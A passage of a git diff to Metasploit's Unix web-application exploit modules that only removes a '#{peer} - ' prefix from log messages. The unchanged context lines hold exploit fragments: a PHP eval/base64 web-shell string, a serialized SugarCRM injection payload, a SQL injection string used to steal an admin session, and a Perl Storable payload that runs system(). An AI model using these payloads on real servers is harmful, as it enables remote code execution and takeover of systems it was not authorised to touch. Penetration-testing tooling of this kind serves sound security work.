Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") + print_status("Requesting shell [ #{uri}/sites/default/images/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "sites", "default", "images", "#{payload_name}") @@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index 6a25429929..df8f0518c8 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") + print_error("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 9e01b897dc..25611c3bcb 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # def login(user, pass) @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};" - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "index.php"), @@ -81,10 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if res and res.code == 200 and res.body =~ /Portal\.php/ - print_good("#{peer} - Authenticated as user '#{user}'") + print_good("Authenticated as user '#{user}'") return true else - print_error("#{peer} - Authenticating as user '#{user}' failed") + print_error("Authenticating as user '#{user}' failed") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def execute_command(cmd, opts = { :php_function => 'system' } ) code = Rex::Text.uri_encode(Rex::Text.encode_base64(cmd+"&")) junk = rand_text_alphanumeric(rand(10)+6) - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote ].sample res = execute_command(payload.encoded, { :php_function => php_function }) if res and res.code == 200 and res.body =~ /hacking_log/i - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 722f946e36..3c4ca54256 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check - print_status("#{peer} - Sending check") + print_status("Sending check") begin res = send_request_cgi({ 'method' => 'GET', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload - print_status("#{peer} - Sending payload (#{code.length} bytes)") + print_status("Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 402c9a0d33..71382a1f17 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) if res and res.code == 404 - print_error("#{peer} - The upload most likely failed") + print_error("The upload most likely failed") return end @@ -123,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload(:unlink_self=>true) - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") res = upload_php(base, php_fname, p, folder_name) if not res - print_error("#{peer} - No response from server") + print_error("No response from server") return end - print_status("#{peer} - Executing '#{php_fname}'...") + print_status("Executing '#{php_fname}'...") exec_php(base, res) end end diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index d61721a33b..e01415cfb4 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -59,19 +59,19 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No process-upload.php found") + vprint_error("No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 - vprint_error("#{peer} - Unable to write file") + vprint_error("Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ - vprint_error("#{peer} - File process-upload.php is not executable") + vprint_error("File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ - vprint_error("#{peer} - Software is misconfigured") + vprint_error("Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ - vprint_error("#{peer} - Upload folder is not writable") + vprint_error("Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s - print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + print_status("Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ - print_good("#{peer} - Payload uploaded successfully (#{fname})") + print_good("Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ - print_warning("#{peer} - File upload may have failed") + print_warning("File upload may have failed") return fname else - vprint_status("#{peer} - Received response: #{res.code} - #{res.body}") + vprint_status("Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end @@ -137,18 +137,18 @@ class Metasploit3 < Msf::Exploit::Remote # Execute uploaded file # def exec(upload_path) - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res - print_status("#{peer} - Request timed out while executing") + print_status("Request timed out while executing") elsif res.code.to_i == 404 - vprint_error("#{peer} - Not found: #{upload_path}") + vprint_error("Not found: #{upload_path}") elsif res.code.to_i == 200 - vprint_good("#{peer} - Executed #{upload_path}") + vprint_good("Executed #{upload_path}") else - print_error("#{peer} - Unexpected reply") + print_error("Unexpected reply") end end diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index d5385a3fd3..8f8da55d8e 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version.to_f <= 2.5 return Exploit::CheckCode::Appears @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + print_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "login.php"), @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/ session = $1 - print_status("#{peer} - Login successful") - print_status("#{peer} - Session cookie is [ #{session} ]") + print_status("Login successful") + print_status("Session cookie is [ #{session} ]") else fail_with(Failure::Unknown, "#{peer} - Login was not succesful!") end @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1" sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}" - print_status("#{peer} - Retrieving admin session through SQLi") + print_status("Retrieving admin session through SQLi") res = send_request_cgi({ 'method' => 'POST', 'vars_get' => { "sp_id" => sqli }, @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin session is [ #{adminhash} ]") + print_status("Admin session is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin", "downloads.php"), @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") + print_status("Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}") @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 5503487ccc..4d18db356b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -69,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ - vprint_error("#{peer} - File uploads are disabled") + vprint_error("File uploads are disabled") return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) - print_good("#{peer} - Payload uploaded successfully.") + print_good("Payload uploaded successfully.") register_files_for_cleanup(@fname) if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/ @upload_path = normalize_uri(target_uri.path, "#{$1}") - print_good("#{peer} - Found upload path #{@upload_path}") + print_good("Found upload path #{@upload_path}") else @upload_path = normalize_uri(target_uri.path, 'in') - print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + print_warning("Could not find upload path - assuming '#{@upload_path}'") end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote # Executes our uploaded malicious file # def exec - print_status("#{peer} - Executing #{@fname}...") + print_status("Executing #{@fname}...") res = send_request_raw({ 'uri' => normalize_uri(@upload_path, @fname), 'cookie' => 'access=3' diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 3bdd447427..9a75e1d9cb 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -91,7 +91,7 @@ print "LFI test for storable flaw is: $frozen\n"; =end def check - vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), @@ -103,7 +103,7 @@ print "LFI test for storable flaw is: $frozen\n"; }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") - vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable @@ -158,14 +158,14 @@ print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive - print_status("#{peer} - Using nondestructive attack method") + print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', @@ -201,10 +201,10 @@ print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive - print_status("#{peer} - Using destructive attack method") + print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection - print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', @@ -224,7 +224,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Now we rewrite mt-config.cgi to accept a payload - print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', @@ -247,7 +247,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Finally send the payload - print_status("#{peer} - Sending payload request") + print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index a67c67bbb0..5575ae12fc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => uri) if res and res.body =~ /[1.1 r248]/ - vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found") return Exploit::CheckCode::Appears end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") - vprint_status("#{peer} - Sending request to #{uri}.") + vprint_status("Sending request to #{uri}.") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 6c08aaa9af..918ff7cfb7 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{f}") + print_warning("Deleting #{f}") client.fs.file.rm(f) - print_good("#{peer} - #{f} removed to stay ninja") + print_good("#{f} removed to stay ninja") rescue - print_warning("#{peer} - Unable to remove #{f}") + print_warning("Unable to remove #{f}") end end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") data = "module=Contacts&" data << "Contacts2_CONTACT_offset=1&" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" - print_status("#{peer} - Exploiting the unserialize()") + print_status("Exploiting the unserialize()") res = send_request_cgi( { @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}") end - print_status("#{peer} - Executing the payload") + print_status("Executing the payload") res = send_request_cgi( { diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index b54648b7f0..3f6e06931e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" - print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem") + print_status("Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => normalize_uri(base, "tiki-rss_error.php") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote return else tiki_path = $1 - print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}" + print_good "Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") + print_error("Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_cgi( { @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 037463b905..ac13d101db 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def do_login() - print_status("#{peer} - Logging in...") + print_status("Logging in...") username = datastore['USERNAME'] password = datastore['PASSWORD'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") res.get_cookies end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the PHP object injection...") + print_status("Exploiting the PHP object injection...") exec_php(payload.encoded) end end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index da87cb4613..373ad569cc 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -356,18 +356,18 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(session) - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end @@ -425,22 +425,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.empty? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i users = [] - print_good("#{peer} - #{count_users} users found") + print_good("#{count_users} users found") for i in 0..count_users - 1 user = get_user_data(node_id, i) @@ -466,10 +466,10 @@ class Metasploit3 < Msf::Exploit::Remote @session = nil users.each do |user| - print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...") + print_status("Trying to log into vBulletin admin control panel as #{user[0]}...") @session = do_login(user[0], user[1]) unless @session.blank? - print_good("#{peer} - Logged in successfully as #{user[0]}") + print_good("Logged in successfully as #{user[0]}") break end end @@ -478,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel") end - print_status("#{peer} - Getting the install product security token...") + print_status("Getting the install product security token...") install_token = get_install_token if install_token.nil? fail_with(Failure::Unknown, "#{peer} - Failed to get the install token") @@ -486,9 +486,9 @@ class Metasploit3 < Msf::Exploit::Remote @session_hash = install_token[:session_hash] @product_id = rand_text_alpha_lower(5 + rand(8)) - print_status("#{peer} - Installing the malicious product #{@product_id}...") + print_status("Installing the malicious product #{@product_id}...") if install_product(install_token) - print_good("#{peer} - Product successfully installed... payload should be executed...") + print_good("Product successfully installed... payload should be executed...") else # Two situations trigger this path: # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often. @@ -497,18 +497,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 652d68b0fe..45c8bbe1cf 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -154,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ - vprint_error("#{peer} - Invalid Username or Password.") + vprint_error("Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ - vprint_error("#{peer} - Web client session not found") + vprint_error("Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking if injection is possible...") + print_status("Checking if injection is possible...") res = request('ls -a .') unless res and res.code == 200 @@ -181,7 +181,7 @@ class Metasploit3 < 